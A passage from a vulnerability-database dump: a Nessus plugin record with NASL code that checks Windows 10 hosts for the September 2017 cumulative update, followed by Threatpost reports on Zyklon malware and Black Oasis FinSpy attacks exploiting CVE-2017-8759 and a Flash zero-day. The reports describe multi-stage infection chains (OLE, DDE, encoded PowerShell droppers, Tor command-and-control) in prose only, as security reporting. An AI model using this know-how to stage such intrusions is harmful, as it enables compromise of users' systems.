(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content. To\n exploit the bypass, an attacker must trick a user into\n either loading a page containing malicious content or\n visiting a malicious website. The attacker could also\n inject the malicious page into either a compromised\n website or an advertisement network. The update\n addresses the bypass by correcting how the Edge CSP\n validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740,\n CVE-2017-8752, CVE-2017-8753, CVE-2017-8755,\n CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8746", "CVE-2017-8681", "CVE-2017-8643", "CVE-2017-8713", "CVE-2017-8724", "CVE-2017-8741", "CVE-2017-8757", "CVE-2017-8707", "CVE-2017-8695", "CVE-2017-8751", "CVE-2017-8756", "CVE-2017-8682", "CVE-2017-11764", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8753", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8739", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8752", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8754", "CVE-2017-8735", "CVE-2017-8728", "CVE-2017-8597", "CVE-2017-8677", "CVE-2017-11766", "CVE-2017-8729", "CVE-2017-8649", "CVE-2017-8747", "CVE-2017-8740", "CVE-2017-8748", "CVE-2017-8679", "CVE-2017-8660", "CVE-2017-8687", "CVE-2017-8734", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8706", "CVE-2017-8716", "CVE-2017-8648", "CVE-2017-8712", "CVE-2017-8736", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8755", "CVE-2017-8675", "CVE-2017-8723"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038788.NASL", "href": "https://www.tenable.com/plugins/nessus/103130", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103130);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8597\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8648\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8716\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8724\",\n \"CVE-2017-8728\",\n \"CVE-2017-8729\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8739\",\n \"CVE-2017-8740\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8751\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n\n script_name(english:\"KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by 
multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. 
An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707, \n CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when\n Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. 
The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content. To\n exploit the bypass, an attacker must trick a user into\n either loading a page containing malicious content or\n visiting a malicious website. The attacker could also\n inject the malicious page into either a compromised\n website or an advertisement network. The update\n addresses the bypass by correcting how the Edge CSP\n validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740,\n CVE-2017-8752, CVE-2017-8753, CVE-2017-8755,\n CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. 
(CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038788/windows-10-update-kb4038788\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb942e3e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038788.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038788');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038788])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-01-23T05:27:53", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "Spam campaigns delivering Zyklon HTTP malware are attempting to exploit three relatively new Microsoft Office vulnerabilities. 
The attacks are targeting telecommunications, insurance and financial service firms.\n\nAccording to FireEye researchers who identified the campaigns, attackers are attempting to harvest passwords and cryptocurrency wallet data along with recruiting targeted systems for possible future distributed denial of service attacks.\n\nResearchers said attacks begin with spam campaigns delivering malicious ZIP archives that contain one of several types of DOC files that ultimately exploit one of the three Microsoft Office vulnerabilities.\n\nThe first vulnerability is a .NET framework bug ([CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)) patched by Microsoft last October. Targets that open an infected document allow attackers to install programs, manipulate data and create new privileged accounts, Microsoft said. In the context of the attack described by FireEye, the infected DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from a stored URL.\n\nThe second vulnerability ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)) is a 17-year-old remote code execution bug found in an Office executable called Microsoft Equation Editor. That bug was patched as part of Microsoft\u2019s [Nov. 2017 Patch Tuesday](<https://threatpost.com/microsoft-patches-20-critical-vulnerabilities/128891/>) release. Similar to the previous vulnerability, victims that open a specially crafted DOC automatically download an additional DOC file that contains a PowerShell command used to download the final payload.\n\nMicrosoft doesn\u2019t consider the third flaw, Dynamic Data Exchange (DDE), a vulnerability. Instead, it insists [that DDE is a product feature](<https://threatpost.com/microsoft-provides-guidance-on-mitigating-dde-attacks/128833/>). 
However, in November it released guidance to admins on how to safely disable the feature via new registry settings for Office.\n\nDDE is a protocol that establishes how apps send messages and share data through shared memory. However, attackers have found great success over the past year with macro-based malware exploiting DDE to launch droppers, exploits and malware.\n\nIn the case of the most recent attacks, FireEye said DDE is also used to deliver a dropper.\n\n[Figure: FireEye malware attack vector diagram](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/01/06221836/FireEye_Malware_Attack_Vector.png>)\n\n\u201cIn all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,\u201d researchers wrote. \u201cThe Pause.ps1 script is responsible for resolving the APIs required for code injection.\u201d Ultimately, Pause.ps1 acts as another dropper to deliver the final \u201ccore payload\u201d, the Zyklon malware.\n\n\u201cZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal,\u201d FireEye wrote. \u201cThe malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software.\u201d\n\nIn this case, Zyklon is also configured to cloak communications with its command-and-control via the Tor network. \u201cThe Zyklon executable contains another encrypted file in its .Net resource section named _tor_. 
This file is decrypted and injected into an instance of InstallUtil.exe, and functions as a Tor anonymizer,\u201d researchers said.\n\nFrom there, the malware can be used by an attacker to carry out a number of different tasks: download new plugins, steal passwords, or open a reverse SOCKS5 proxy server on infected hosts, researchers said.\n\n\u201cThese types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting,\u201d FireEye said.\n", "modified": "2018-01-17T18:26:01", "published": "2018-01-17T18:26:01", "id": "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "href": "https://threatpost.com/attackers-use-microsoft-office-vulnerabilities-to-spread-zyklon-malware/129503/", "type": "threatpost", "title": "Attackers Use Microsoft Office Vulnerabilities to Spread Zyklon Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:23", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2017-11292", "CVE-2017-8759"], "description": "Adobe today released an [out-of-band Flash Player update](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) addressing a zero-day vulnerability being exploited by a little-known Middle Eastern APT group.\n\nThe group known as Black Oasis was, as recently as this month, using exploits for the flaw to drop FinSpy as a payload. Sold by the controversial German company Gamma International, FinSpy, or FinFisher, is a suite of surveillance and espionage software used to remotely monitor compromised computers. 
It\u2019s sold to governments and law enforcement around the world, with alleged sales to oppressive regimes in Egypt, Bahrain, Ethiopia, Uganda and elsewhere.\n\nThe vulnerability, CVE-2017-11292, was privately disclosed Oct. 10 by researchers at Kaspersky Lab, who saw the payload and exploit used against a customer\u2019s network. The attackers spread the exploit via email, embedding the Flash exploit inside an ActiveX object inside a Word document. Brian Bartholomew, a member of Kaspersky Lab\u2019s Global Research and Analysis Team (GReAT), said retrieval of the payload\u2014which is the latest FinSpy version\u2014is done in multiple stages.\n\nAdobe said Flash version 27.0.0.159 on the desktop, Linux and Google Chrome is affected, as well as version 27.0.0.130 for Edge and Internet Explorer 11 on Windows 10 and 8.1. Users should be sure to be running Flash 27.0.0.170 on all platforms, or heed the advice of many security experts to disable Flash altogether. [Flash has been designated for end-of-life](<https://threatpost.com/flashs-final-countdown-has-begun/127475/>).\n\nKaspersky Lab published a [report](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) today about the zero day on Securelist.com.\n\nBlack Oasis is a bit of an enigma among APT groups. The group has been on Kaspersky Lab\u2019s radar for nearly a year, Bartholomew said, and has had at least five zero-day vulnerabilities and exploits at its disposal since 2015, all of which have been disclosed and patched. There is only one known victim of the Flash zero day patched today, he said.\n\n\u201cThese guys are definitely customers of Gamma. They\u2019ve been using FinSpy for maybe the last two years,\u201d Bartholomew said. 
\u201cThey were also potentially customers of Hacking Team.\u201d\n\nBlack Oasis appears to have made use of a Hacking Team zero day, [CVE-2015-5119](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>), prior to the Italian software company being hacked in the summer of 2015 and having many of its attacks publicly dumped online.\n\n\u201cWe know this group was also using that exploit, which we assume was unique to Hacking Team customers,\u201d Bartholomew said. \u201cThey had access to it prior to the hack. Once the hack happened, I have not seen them using Hacking Team at all but they have been using FinSpy pretty regularly since.\u201d\n\nThe APT group\u2019s targets are government and military organizations in the Middle East, countries in North Africa, as well as some in Russia, Ukraine and elsewhere in Europe.\n\n\u201cFinSpy seems to be their payload of choice,\u201d Bartholomew said.\n\nThis is the second zero-day vulnerability in possession of Black Oasis to be patched in the last month. In September, [FireEye disclosed](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) CVE-2017-8759, which was patched by Microsoft and used to spy on an unnamed Russian individual. The vulnerability was described as a SOAP WSDL parser code injection bug spread via Microsoft Office RTF documents. The code injection was used to download and execute script that included PowerShell commands.\n\n\u201cIn the last two months, they\u2019ve burnt two zero days. It\u2019s very evident they have access to a wide swathe of zero days,\u201d Bartholomew said.\n\nZero days can sell for six or seven figures on gray or black markets. 
They are a source of constant debate between security and privacy experts and governments who buy these attacks for exclusive use as lawful intercept tools in the name of national security or law enforcement purposes.\n\nWhile Black Oasis may be very well resourced, its operational security may be lacking. For example, the group re-used command and control servers burned by the FireEye disclosure in this recent round of attacks using the Flash zero day.\n\n\u201cThey had right around a month to move their infrastructure, but yet they didn\u2019t,\u201d Bartholomew said.\n\nThe emergency update comes less than a week after Patch Tuesday when for the first time in recent memory, Adobe did not publish any security updates for any of its products.\n", "modified": "2017-10-16T11:46:13", "published": "2017-10-16T11:46:13", "id": "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "href": "https://threatpost.com/adobe-patches-flash-zero-day-exploited-by-black-oasis-apt/128467/", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Exploited by Black Oasis APT", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-0161", "CVE-2017-8628", "CVE-2017-8759"], "description": "An actively exploited zero-day vulnerability tied to Microsoft\u2019s .NET framework is one of 25 critical and 54 important vulnerabilities fixed by Microsoft in its September Patch Tuesday security bulletin.\n\nAccording to Microsoft, the .NET framework vulnerability ([CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>)) 